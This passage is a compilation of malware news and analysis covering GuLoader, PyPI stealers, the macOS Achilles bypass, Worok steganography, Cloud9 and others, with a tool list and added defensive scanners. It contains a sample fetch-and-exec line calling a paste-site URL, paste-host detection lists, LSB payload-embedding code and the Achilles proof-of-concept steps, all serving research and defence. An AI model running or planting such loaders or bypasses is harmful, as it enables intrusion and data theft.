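    directory = (entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
                 + entry("ThisDocument", 2, FREESECT, 2, len(payload))).ljust(ss, b"\0")
    header = HEADER.pack(CFB_SIGNATURE, b"\0" * 16, 0x3E, 3, 0xFFFE, 9, 6, b"\0" * 6,
                         0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0,
                         0, *([FREESECT] * 108))
    return header + struct.pack(f"<{ss // 4}I", *fat) + directory + payload

if __name__ == "__main__":
    doc = CompoundFile(build_sample_doc())
    for e in doc.directory():
        print(f"{e['type']:<8} {e['name']:<16} start={e['start']} size={e['size']}")
```

The loop guard in `chain()` is not optional: malformed documents with self-referencing FAT entries are a known way to hang naive parsers, and a triage script that never returns is as bad as one that misses the macro.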
A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and produces an executable.
Generic Decompiler
Metadefender.com – Scan a file, hash or IP address for malware (free).
NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
Aleph – Open-source malware analysis pipeline system.
CRITs – Collaborative Research Into Threats, a malware and threat repository.
FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.
AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
diStorm – Disassembler for analyzing malicious shellcode.
JS Beautifier – JavaScript unpacking and deobfuscation.
JS Deobfuscator – Deobfuscate simple JavaScript that uses eval or document.write to conceal its code.
libemu – Library and tools for x86 shellcode emulation.
malpdfobj – Deconstruct malicious PDFs into a JSON representation.
OfficeMalScanner – Scan for malicious traces in MS Office documents.
olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
Origami PDF – A tool for analyzing malicious PDFs, and more.
PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
peepdf – Python tool for exploring possibly malicious PDFs.
QuickSand – A compact C framework to analyze suspected malware documents, identify exploits in streams of different encodings, and locate and extract embedded executables.
SpiderMonkey – Mozilla's JavaScript engine, for debugging malicious JS.
Practice Malware Analysis Tools
Practice reverse engineering. Be careful with malware.
RPISEC Malware Analysis – The course materials used in the Malware Analysis course at Rensselaer Polytechnic Institute during Fall 2015.
/r/ReverseEngineering – Reverse engineering subreddit, not limited to just malware.
Credits
This list was created with the help of the following people.
Lenny Zeltser and other contributors, for developing REMnux.
Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard, for writing the Malware Analyst's Cookbook, which was a big inspiration for creating the list.
Cybersecurity researchers at CrowdStrike have recently detailed GuLoader, an advanced malware downloader that evades security software with a variety of techniques.
While analyzing GuLoader's shellcode, CrowdStrike discovered a new anti-analysis technique: the malware scans the entire process memory for VM-related strings to determine whether it is running in an analysis environment.
Evolution of GuLoader Malware
On infected machines, GuLoader (aka CloudEyE) uses a VBS downloader to deliver remote access trojans such as AgentTesla, FormBook, Nanocore, NETWIRE, Remcos, and Parallax RAT.
GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems.
It has also been distributed through other channels, such as exploit kits and compromised websites, and has been used in campaigns delivering ransomware, banking Trojans, and other malware.
GuLoader also deploys strong anti-analysis techniques to stay undetected.
GuLoader runs in three stages: the VBScript first injects the shellcode embedded within it into memory; the shellcode then performs anti-analysis checks that protect the code from being analyzed.
The shellcode reuses those same anti-analysis methods throughout. Through it, the attacker downloads a final payload of their choice and executes it on the compromised host under the same protections.
Anti-debugging and anti-disassembly checks in the malware detect breakpoints placed for code analysis.
A redundant code injection mechanism avoids the NTDLL.dll API hooks that antivirus products and EDRs commonly install in order to detect and flag suspicious processes on Windows.
Anti-Analysis Techniques
Here below we have mentioned the anti-analysis techniques used:-
Anti-Debugging
Anti-Virtual Machine
Process Hollowing
Experts pointed out that GuLoader remains a treacherous threat that keeps evolving, and provided indicators of compromise for the latest version of the downloader along with other key information.
Researchers at Phylum recently discovered that attackers have been publishing Python packages that plant information-stealer malware on developers' machines.
Digging deeper, they found a new stealer variant circulating under many different names; its source code is a straightforward copy of the older W4SP stealer.
Attack Chain to Deploy Malware
In most cases the stealer was dropped directly into the package's main.py file, with no obfuscation and no real attempt to evade detection.
Only one instance used multiple stages to obfuscate and obscure the attacker's intentions: a package called chazz used a simple first stage to pull obfuscated code from the klgrth.io paste site.
The first stage of that stealer code closely resembles the injector code. It is obfuscated with BlankOBF, an obfuscation tool; once de-obfuscated, it reveals the Leaf $tealer.
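The two-stage pattern above, a tiny loader that fetches code from a paste site and hands it to exec(), is simple enough to catch statically before a package is installed. The following is an added example written for this page, not Phylum's scanner: it parses a module with Python's ast module and reports exec()/eval() calls fed by a network fetch, by a base64/zlib decoder, or by an opaque long literal, plus any URL pointing at a known paste host. The paste-host list is an assumption, and the three sample modules are constructed to model the chain described in the text (the URL in the first one is the one quoted in the package list below), not the actual package contents.

```python
"""Static triage of a Python package file for the first-stage loader pattern described
above: code that fetches text from a paste site and hands it to exec()/eval(), or that
exec()s the output of a base64/zlib decoder. The paste-host list is an assumption and
the three sample modules are constructed for the example."""
import ast
import base64
from collections import namedtuple
from urllib.parse import urlparse

PASTE_HOSTS = ("klgrth.io", "pastebin.com", "paste.ee", "hastebin.com", "rentry.co", "transfer.sh")  # assumption
NETWORK_CALLS = {"get", "post", "urlopen", "urlretrieve"}
NETWORK_ATTRS = {"text", "content"}
DECODER_CALLS = {"b64decode", "b32decode", "a85decode", "b85decode", "decompress", "unhexlify", "decodebytes"}
LONG_LITERAL = 200   # characters; opaque blobs fed to exec() are rarely shorter

Finding = namedtuple("Finding", "rule line detail")

def _callee(call: ast.Call) -> str:
    """Name of the function being called: exec(...), base64.b64decode(...), requests.get(...)."""
    f = call.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""

def _paste_host(value: str) -> str:
    """Return the matching paste host if the string is a URL to one, else ''."""
    if "://" not in value:
        return ""
    host = (urlparse(value).hostname or "").lower()
    return next((h for h in PASTE_HOSTS if host == h or host.endswith("." + h)), "")

def scan_source(src: str, filename: str = "<module>") -> list:
    """Return Findings for one module's source; an empty list means nothing matched."""
    tree = ast.parse(src, filename)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            host = _paste_host(node.value)
            if host:
                findings.append(Finding("remote_paste_url", node.lineno, node.value))
        elif isinstance(node, ast.Call) and _callee(node) in ("exec", "eval"):
            # Everything inside the exec()/eval() argument list: nested calls, attributes, literals.
            subtree = [n for n in ast.walk(node) if n is not node]
            calls = {_callee(n) for n in subtree if isinstance(n, ast.Call)}
            attrs = {n.attr for n in subtree if isinstance(n, ast.Attribute)}
            literals = [n.value for n in subtree if isinstance(n, ast.Constant) and isinstance(n.value, str)]
            if calls & NETWORK_CALLS or attrs & NETWORK_ATTRS:
                findings.append(Finding("exec_of_network_fetch", node.lineno,
                                        ", ".join(sorted((calls & NETWORK_CALLS) | (attrs & NETWORK_ATTRS)))))
            if calls & DECODER_CALLS:
                findings.append(Finding("exec_of_decoded_blob", node.lineno, ", ".join(sorted(calls & DECODER_CALLS))))
            if any(len(s) >= LONG_LITERAL for s in literals):
                findings.append(Finding("exec_of_long_literal", node.lineno, f"{max(map(len, literals))} chars"))
    return findings

# Constructed samples modelled on the chain described above (not the actual package contents).
SAMPLE_FIRST_STAGE = '''
import requests
exec(requests.get("https://www.klgrth.io/paste/j2yvv/raw").text)
'''
SAMPLE_DECODED_BLOB = "import base64\nexec(base64.b64decode(%r))\n" % base64.b64encode(b'print("second stage")').decode()
SAMPLE_BENIGN = '''
import json, requests
release = json.loads(requests.get("https://pypi.org/pypi/requests/json").text)
print(release["info"]["version"])
'''

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_source(fh.read(), path):
                print(f"{path}:{f.line}: {f.rule} ({f.detail})")
    if len(sys.argv) == 1:
        print(scan_source(SAMPLE_FIRST_STAGE))
```

Run it over setup.py, __init__.py and main.py of a package before installing it. The benign sample shows the limit of the heuristic in the other direction: fetching JSON from PyPI is not flagged because nothing fetched reaches exec(); the rules key on the sink, not on network access as such.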
Malicious Packages
Listed below are packages that share similar IOCs; this list can be expected to grow over the coming months and years:
modulesecurity – "Celestial Stealer"
informmodule – "Leaf $tealer"
chazz – first stage that pulls from https://www.klgrth.io/paste/j2yvv/raw, which contains the obfuscated code referred to above
randomtime – "ANGEL stealer"
proxygeneratorbil – "@skid STEALER"
easycordey – "@skid Stealer"
easycordeyy – "@skid Stealer"
tomproxies – "@skid STEALER"
sys-ej – "Hyperion Obfuscated code"
infosys – "@734 Stealer"
sysuptoer – "BulkFA Stealer"
nowsys – "ANGEL Stealer"
upamonkws – "PURE Stealer"
captchaboy – "@skid STEALER"
proxybooster – "Fade Stealer"
W4SP Copies
W4SP's original publication in loTus's repository has been disabled by GitHub staff for violating GitHub's terms of service, so it can no longer be found there.
Phylum has for some time been monitoring these threat actors with the aim of finally bringing down their infrastructure, given how persistent, pervasive, and egregious their activity is.
Several copies of W4SP-Stealer surfaced under different names as soon as the W4SP-Stealer repo was removed. The new stealer is already being distributed through PyPI, a sign that it is becoming a real threat.
W4SP has been found hosted in two GitHub repositories under two different aliases, each with its own purpose:
Satan Stealer
angel-stealer
A copy of the original source, as well as earlier versions of W4SP, is hosted in an account named aceeontop.
W4SP Stealer will likely remain part of the scene for quite some time to come, as will its imitations and other variants.
Their attempts will only grow in number, persistence, and sophistication as time passes. Phylum states that its platform is capable of mitigating and blocking such supply chain attacks.
Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.
Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.
Apple's Gatekeeper is designed to protect macOS users by performing a number of checks before allowing a downloaded app to run. In its default configuration it refuses to run apps that are not signed by an identified developer (and, on current macOS versions, notarized by Apple) or that did not come from the App Store, unless the user explicitly overrides the check.
The flaw, discovered on July 27, 2022, by Jonathan Bar Or of Microsoft, is a logic issue that Apple addressed with improved checks.
"On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple's Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call 'Achilles'," reads the post published by Microsoft.
Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.
The experts also pointed out that Apple's Lockdown Mode, introduced in July, does not prevent exploitation of the Achilles bug.
The Achilles technique abuses the Access Control List (ACL) permission model: it applies extremely restrictive permissions to a downloaded file (i.e., "everyone deny write,writeattr,writeextattr,writesecurity,chown"), which stops the Safari browser from setting the com.apple.quarantine extended attribute that Gatekeeper keys on.
Below is the PoC developed by Microsoft:
Create a fake directory structure with an arbitrary icon and payload.
Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of "everyone deny write,writeattr,writeextattr,writesecurity,chown"). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
Create an archive with the application alongside its AppleDouble file and host it on a web server.
Malware attacks are a growing problem in our increasingly digital world. By infiltrating computers and networks, malicious software can cause serious harm to those affected by it.
One of the most common types of malware is ransomware (encryption-based malware), which prevents users from accessing their files until they pay a hefty fee to the cyber attacker. This type of attack has been used to target everything from individuals to large organizations, including government agencies and healthcare providers.
In addition to financial losses, malware attacks can have devastating effects on businesses and individuals. In some cases, sensitive data can be stolen or destroyed as part of an attack. This can lead to identity theft and other forms of fraud, as well as put organizations at risk for long-term damage if confidential information is exposed or compromised.
Research Findings
A recent study by Atlas VPN shows how malware infection is on the rise and the trends in the new malware samples found in the first three quarters of 2022.
According to researchers, 59.58 million samples of new Windows malware were found in the first three quarters of 2022 and these make up 95.6% of all new malware discovered during that time period.
This analysis was based on data from AV-TEST GmbH, an independent organization that evaluates and rates antivirus products and provides IT security and antivirus research services. The study also covers the new malware samples detected in the four quarters of 2021 and the first three quarters of 2022.
Windows, Linux, and Android Malware
Overall, the data shows a downward trend: the number of new malware samples this year is 34% lower than in the same period last year. The numbers are nevertheless still exceptionally high.
Following Windows on the list is Linux, with 1.76 million new malware samples, or 2.8% of all malware threats in 2022.
Android malware takes third place with the first three quarters of 2022 seeing 938,379 new Android malware threats, constituting 1.5% of the total new malware.
Lastly, 8,329 samples of never before seen malware threats aimed at macOS were observed in the same period.
Total Number of Malware
The study also shows that the total number of malware threats found in the first three quarters of 2022 across all operating systems amounts to 62.29 million, or about 228,164 new threats per day.
In a quarter-by-quarter comparison, the first quarter of 2022 saw the largest number of new samples, 22.35 million. That number dropped by 4% to 21.49 million in the second quarter and by another 14% to 18.45 million in the third.
The numbers continue to fall into the fourth quarter, with 7.62 million new threats found in October and November, nearly 60% fewer than at the same time last year.
Protection Against Malware
Malware is a pervasive threat to internet users on both personal and professional networks. It can cause serious damage to computers, networks, and data that can be expensive to fix. Fortunately, there are steps you can take to protect yourself from malware.
The most important step in protecting your network from malware is keeping your anti-malware software up to date. Regularly updating anti-malware programs ensures that they are able to detect the latest threats and keep them away from your computer or network.
Additionally, do not click on suspicious links or download files from unknown sources, as these could contain malicious code that harms your system.
Another way to stay safe online is to use a secure web browser with built-in security features such as pop-up blockers, phishing protection, and ad blockers (don't use it on Hackread.com though :0) for enhanced protection against malicious activity.
ThreatFabric's security researchers have reported a new dark web platform through which cybercriminals can easily add malware to legitimate Android applications.
Dubbed Zombinder, the platform was detected while investigating a campaign in which attackers were distributing multiple kinds of Windows and Android malware, including the Ermac Android banking trojan, the Laplas "clipper," Erbium, and the Aurora stealer.
This comes just days after a new dark web marketplace called InTheBox surfaced online, serving smartphone malware developers and operators.
Further investigation traced the adversary to a third-party dark web service called Zombinder, an APK binding service launched in March 2022.
According to ThreatFabric's blog post, numerous threat actors use this service and advertise it on hacker forums. On one such forum it was promoted as a universal binder that attaches malware to almost any legitimate app.
The campaign is designed to look as if it helps users gain access to internet hotspots by imitating a WiFi authorization portal; in reality, it pushes several different malware strains.
What does Zombinder Do?
In the campaign detected by ThreatFabric's researchers, the service is distributing the Xenomorph banking malware disguised as the VidMate app. It is distributed via modified apps advertised on, and downloaded from, a malicious website mimicking the application's original website. Victims are lured to this site via malicious ads.
The Zombinder-infected app works just as it is marketed, while the malicious activity carries on in the background and the victim stays unaware of the malware infection.
At the moment, Zombinder focuses entirely on Android apps, but the service operators also offer Windows app binding. Those who downloaded the infected Windows app were delivered the Erbium stealer, an infamous Windows malware that steals stored passwords, cookies, credit card details, and cryptocurrency wallet data.
It is worth noting that there are two download buttons on the malicious website's landing page, one for Windows and the other for Android. When a user clicks the Download for Windows button, they are delivered malware designed for Microsoft's operating system, including Aurora, Erbium, and the Laplas clipper. Conversely, the Download for Android button distributes the Ermac malware.
How to Stay Protected?
If you want to stay safe, do not sideload apps, even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources on your Android phone; rely on legitimate sources such as the Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app's rating and reviews, and check out the app developer's website before installing a new app.
Forget Sergeant Pepper and his Lonely Hearts Club Band, who taught the band to play a mere 20 years ago today.
December 2022 sees the 35th anniversary of the first major self-spreading computer virus, the infamous CHRISTMA EXEC worm that temporarily crushed the major mainframe networks of the day…
… not by any deliberately coded side-effects such as file scrambling or data deletion, but simply by leeching too much network bandwidth for its own unauthorised purpose.
As a decoy to disguise the fact that it read in the 1980s IBM equivalents of your email address book (NAMES) and your known-hosts file (NETLOG) in order to find as many new recipients of the malware as possible to send itself to, the malware displayed this:
*
*
***
*****
*******
*********
************* A
*******
*********** VERY
***************
******************* HAPPY
***********
*************** CHRISTMAS
*******************
*********************** AND MY
***************
******************* BEST WISHES
***********************
*************************** FOR THE NEXT
******
****** YEAR
******
If you're wondering why the virus is widely known as CHRISTMA EXEC, rather than by the full word CHRISTMAS…
…that's because filenames were limited to eight characters, which could be followed by a space and what we would today call an “extension” of EXEC in order to turn them into scripts that could be run directly by the user (executed, in technical jargon).
The virus itself was written in IBM's powerful text-based scripting language REXX (the resoundingly named Restructured Extended Executor), so a non-programmer looking at the message would probably recognise it as “program code”, and therefore tend to ignore it as unimportant and irrelevant, for all that it might look interesting.
Except that the author of the virus found a cheerful way to embed an instructional lure right into the code itself, which starts with a remark (as in the C language, text between /* and */ in REXX programs is treated as a comment and ignored when the file gets used)…
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
…and then offers the following cheery advice to non-techies:
/* browsing this file is no fun at all
just type CHRISTMAS from cms */
CMS is short for Conversational Monitor System, a command prompt environment on top of IBM's venerable VM/370 operating system and its many variants, which offered individual users a real-time virtual machine that behaved like a computer all of their own, with its own disk space for storing personal files and programs.
Handily, the user didn't have to be taught to leave the final -S off the word CHRISTMAS, because CMS would automatically ignore any extra characters and hunt for CHRISTMA EXEC, which was the very script program that the user had just received without expecting it or asking for it.
As stated above, the code did indeed display the Christmas Tree ASCII art, or, more precisely, EBCDIC art, given that IBM famously had its own character encoding system known as Extended Binary Coded Decimal Interchange Code (pronounced ebb-si-dick).
But it also trawled through your NAMES and NETLOG files, which listed other users and computers you regularly contacted, and copied itself to all of them, so that for every user who innocently typed CHRISTMAS at the command prompt…
…a sea of copies of the virus (20? 50? 200?) would be distributed, potentially worldwide, and if any of those recipients (20? 50? 200?) innocently typed CHRISTMAS at the command prompt…
…a sea of copies of the virus would be distributed, and so on, and so on.
This is just like modern macro malware that says to the user, “Hey, macros are disabled, but for your ‘extra safety’ you need to turn them back on… why not click the button? It's much easier that way.”
35 years ago, malware writers had already figured out that if you ask users nicely to do something that is not at all in their interest, some of them, possibly many of them, will do it.
Recently, cybersecurity researchers at Sucuri found that threat actors are conducting a massive black hat search engine optimization (SEO) campaign.
In this campaign, nearly 15,000 websites redirected visitors to fake Q&A discussion forums. Over the course of September and October, Sucuri's SiteCheck scanner detected over 2,500 redirects to other sites.
The experts also stated that each and every compromised site contains nearly 20,000 files, all of which were being used as part of the malicious campaign, and that most of the affected sites were running WordPress.
Malicious ois[.]is Redirects
According to the Sucuri report, after detecting the malware, the experts conducted a brief survey and found that most website malware infections limit themselves to a smaller number of files.
They also limit their footprint so that they can avoid detection and keep operating.
A website infected with this malware, by contrast, will on average have over 100 files infected, which is what sets this malware apart from others.
Common Infected Files
This malware is most commonly found infecting core WordPress files, and it has also been found to infect “.php” files that were created by unrelated malware campaigns.
The following is a list of the top 10 most commonly infected files:-
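Independently of that list, an infection that touches 100+ files per site, core WordPress files included, is exactly what a file-integrity sweep against a known-good snapshot catches. The following is an added example (my code, not Sucuri's tooling). It assumes a manifest of known-good SHA-256 hashes exists for the site; here one is built from a constructed toy tree in a temporary directory, the tree is then tampered with (a core file modified, an extra .php file dropped), and the sweep reports what changed. The file names and contents are constructed stand-ins.

```python
"""Added example, not from the article or from Sucuri: compare a live web root
against a manifest of known-good SHA-256 hashes and report modified, missing
and unexpected files. The toy tree and its contents are constructed."""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 (files can be large, so read in chunks)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map relative path -> SHA-256 for every file under `root` (the known-good snapshot)."""
    manifest: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def check_tree(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the live tree to the manifest. Unexpected .php files are the
    injected droppers such campaigns leave behind; modified core files are the
    injected redirect code."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def demo() -> Dict[str, List[str]]:
    """Build a constructed WordPress-like tree, snapshot it, tamper with it, run the check."""
    with tempfile.TemporaryDirectory() as root:
        clean = {  # constructed stand-ins for core files
            "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
            "wp-blog-header.php": "<?php // constructed stand-in for a core file\n",
            "wp-includes/load.php": "<?php function wp_load_example() {}\n",
        }
        for rel, body in clean.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(body)
        manifest = build_manifest(root)

        # Simulated infection: a core file gains appended code, an extra PHP file appears.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("<?php // constructed tampering appended to a core file\n")
        with open(os.path.join(root, "wp-includes/cache-helper.php"), "w") as f:
            f.write("<?php // constructed stand-in for a dropped file\n")
        return check_tree(root, manifest)


if __name__ == "__main__":
    print(demo())
```

For a real site the manifest should come from a trusted source rather than from the live tree (WordPress core ships with published checksums per version), and the sweep belongs in a scheduled job whose output is compared run over run, since the infection described above re-touches files across the whole install rather than a single dropper.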
The Worok threat infects victimsâ computers with information-stealing malware by concealing malware within PNG images with the help of the Steganography technique, which makes it very difficult to detect by malware scanners.
The finding has substantiated one of the most crucial links in the chain of infection of the threat actor as claimed by the experts at Avast. These malicious PNG images are used by threat actors to conceal a payload that facilitates information theft under the guise of being an image.
In the past couple of months, ESET has been revealing details of attacks that Worok has been launching against several high-profile companies and local government agencies in the following regions:-
Middle East
Southeast Asia
South Africa
There are tactical overlaps between Worok and a Chinese threat actor known as TA428 that is believed to be sharing similar tactics.
Compromise Chain
Worok's compromise chain relies on steganography, a technique that hides scripts within PNG images, and begins with a C++-based loader known as “CLRLoad.”
As of right now, we do not know what vector was used in the initial attack. As part of certain intrusions, the malware was also deployed on Microsoft Exchange Server by exploiting the ProxyShell vulnerability.
A custom malicious kit was then deployed by the attackers using publicly available exploit tools. The final compromise chain can be summarized as follows:-
First, CLRLoader runs; its simple code loads PNGLoader, the second stage in the process.
PNGLoader comes in two variants that decode the malicious code hidden within the image and launch one of the following payloads:-
PowerShell script
.NET C#-based
The PowerShell script has been difficult to recover, but researchers have recently discovered a new malware called DropboxControl, spyware that steals information from the system and provides the threat actor with the ability to upload, download, and run commands contained in specific files.
Malware in PNG Files
When an image carrying the steganographic code is opened in an image viewer, it appears to be a normal image file.
The image was encoded so that malicious code is embedded in the least significant bits of each pixel, a technique known as “least significant bit” (LSB) encoding.
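To make the mechanics concrete, here is an added example (my code, not the article's and not Avast's or ESET's analysis tooling). It writes a constructed payload into the least significant bits of a constructed grayscale carrier, shows that no sample moves by more than one level (which is why a viewer sees nothing), recovers the bytes the way a second-stage loader would, and then runs the classic pairs-of-values chi-square statistic that defenders use to flag an LSB plane that has been overwritten by a high-entropy payload. Reading pixels from an actual PNG (for example with Pillow) is assumed and left out; a flat list of 8-bit samples stands in for the image, and the flagging threshold is a heuristic, not a calibrated p-value.

```python
"""Added example, not from the article: LSB embedding/extraction on a
constructed carrier plus the pairs-of-values chi-square check. A flat list
of 8-bit samples stands in for decoded PNG pixel data."""
import random
from typing import List, Tuple


def embed_lsb(samples: List[int], payload: bytes) -> List[int]:
    """Copy `samples`, overwriting the LSB of successive samples with payload bits."""
    bits = [(b >> (7 - i)) & 1 for b in payload for i in range(8)]
    if len(bits) > len(samples):
        raise ValueError("payload does not fit in carrier")
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # only the lowest bit changes
    return out


def extract_lsb(samples: List[int], nbytes: int) -> bytes:
    """Rebuild `nbytes` bytes from the LSB plane (the loader's side of the technique)."""
    out = bytearray()
    for i in range(nbytes):
        byte = 0
        for s in samples[i * 8:(i + 1) * 8]:
            byte = (byte << 1) | (s & 1)
        out.append(byte)
    return bytes(out)


def max_sample_delta(a: List[int], b: List[int]) -> int:
    """LSB replacement never moves a sample by more than 1, hence no visible change."""
    return max(abs(x - y) for x, y in zip(a, b))


def pairs_of_values_chi2(samples: List[int]) -> Tuple[float, int]:
    """Westfeld/Pfitzmann statistic: replacing LSBs with balanced bits equalises
    the counts of each value pair (2k, 2k+1). Returns (chi2, degrees of freedom)."""
    hist = [0] * 256
    for s in samples:
        hist[s] += 1
    chi2, pairs = 0.0, 0
    for k in range(128):
        total = hist[2 * k] + hist[2 * k + 1]
        if total == 0:
            continue
        expected = total / 2.0
        chi2 += (hist[2 * k] - expected) ** 2 / expected * 2  # both halves deviate equally
        pairs += 1
    return chi2, max(pairs - 1, 1)


def lsb_replacement_ratio(samples: List[int]) -> float:
    """chi2 / df. Close to 1 means the pairs are as balanced as full LSB replacement
    leaves them; natural or contrast-stretched images score far higher. Heuristic only,
    and weak when the payload covers only a small fraction of the image."""
    chi2, df = pairs_of_values_chi2(samples)
    return chi2 / df


def make_carrier(n: int, seed: int = 1) -> List[int]:
    """Constructed stand-in for a real image: Gaussian samples contrast-stretched by
    1.5x, which leaves histogram gaps the way processed photos often do."""
    rng = random.Random(seed)
    return [min(255, max(0, int(rng.gauss(100, 20)) * 3 // 2)) for _ in range(n)]


def demo() -> dict:
    carrier = make_carrier(8192)
    rng = random.Random(7)
    # Constructed high-entropy blob standing in for an encrypted implant.
    payload = bytes(rng.getrandbits(8) for _ in range(len(carrier) // 8))
    stego = embed_lsb(carrier, payload)
    return {
        "max_delta": max_sample_delta(carrier, stego),
        "recovered": extract_lsb(stego, len(payload)) == payload,
        "clean_ratio": lsb_replacement_ratio(carrier),
        "stego_ratio": lsb_replacement_ratio(stego),
    }


if __name__ == "__main__":
    print(demo())
```

The statistic works because sequential LSB replacement with a random-looking payload averages each (2k, 2k+1) pair; an image whose LSB plane has been filled this way drops to a ratio near 1 while the untouched carrier stays far above it. Modern embedders that scatter bits or use LSB matching defeat this particular check, so in practice it is one signal among several (file-size anomalies, PNG chunk oddities, and the loader that reads the image being the stronger ones).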
No matter how the third-stage implant is deployed, it is clear that Worok has intelligence-gathering objectives that go beyond simply harvesting files of interest.
Worok attacks rely on tools that are not circulating in the wild, so it is likely that the group uses these tools exclusively to conduct its attacks.
Indicators of Compromise
PNG file with steganographically embedded C# payload
Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called âCloud9â that is intent on stealing the following information using malicious extensions:-
Targeting web browsers is becoming increasingly attractive for malware developers because browsers hold the most valuable information about a user.
Keystrokes and session cookies reveal a great deal about a user's everyday activities, and access to such information can lead to a security breach or privacy violation.
The Cloud9 botnet is a RAT that affects all Chromium-based web browsers, including popular consumer browsers such as Chrome and Microsoft Edge. Moreover, threat actors could use this RAT to remotely execute arbitrary commands.
Technical Analysis
The official Chrome Web Store doesn't host this malicious Chrome extension, so it cannot be downloaded from there.
Distribution of this malware instead relies on communities operated by threat actors, where users of the tool hide the malware before it is delivered to victims by the tool itself.
The extension consists of only three JavaScript files; most of its functionality is located in a file called “campaign.js.”
According to the report, during the initialization of campaign.js, the window.navigator API is used to identify the system's operating system. Once the target has been identified, a JavaScript file is injected into the victim's computer system to mine cryptocurrency using the victim's computing resources.
Next, for further proceedings, it injects another script known as cthulhu.js which comprises a full-chain exploit for the following flaws:-
CVE-2019-11708 (Firefox)
CVE-2019-9810 (Firefox)
CVE-2014-6332 (Internet Explorer)
CVE-2016-0189 (Internet Explorer)
CVE-2016-7200 (Edge)
As soon as the vulnerabilities are exploited, Windows malware is automatically installed on the host machine and executed. This gives attackers even more opportunities to compromise systems and carry out even more severe malware attacks.
One of the more sophisticated components of this malware is “Clipper,” a module that continuously scans the system clipboard for copied data such as:-
Passwords
Credit card details
In addition to injecting ads into webpages silently, Cloud9 is also capable of generating revenue for its operators by generating ad impressions.
During recent research, Microsoft has discovered evidence of a complex interconnected malware ecosystem that is associated with the Raspberry Robin worm.
Several links between the Raspberry Robin worm and other malware families have been identified, and security experts have also observed it using alternative infection tactics.
Infections like these lead to a variety of complications, listed here:-
Hands-on-keyboard attacks: A hands-on-keyboard attack occurs when attackers are already inside your environment following a breach. It is a two-sided operation; on one end is the cybercriminal who sits at a keyboard, while on the other side is your compromised network that is being accessed.
Human-operated ransomware activity: This occurs when cybercriminals are involved in an active attack on a victim. Using this approach, an organization's on-premises infrastructure is penetrated, privileges are elevated, and ransomware is deployed by the threat actors.
Compromised 1,000 Organizations
In the past 30 days, the Raspberry Robin worm has triggered payload alerts on more than 3,000 devices across more than 1,000 organizations. There have been instances where the Raspberry Robin worm has been installed on victims' systems together with malware called FakeUpdates.
Raspberry Robin is also known as QNAP Worm because it uses compromised QNAP storage servers for command-and-control. It spreads to other devices through infected USB drives containing malicious .LNK files.
The worm spawns an msiexec process via cmd[.]exe as soon as a USB device is attached.
The malware reaches its C2 servers through compromised Windows devices.
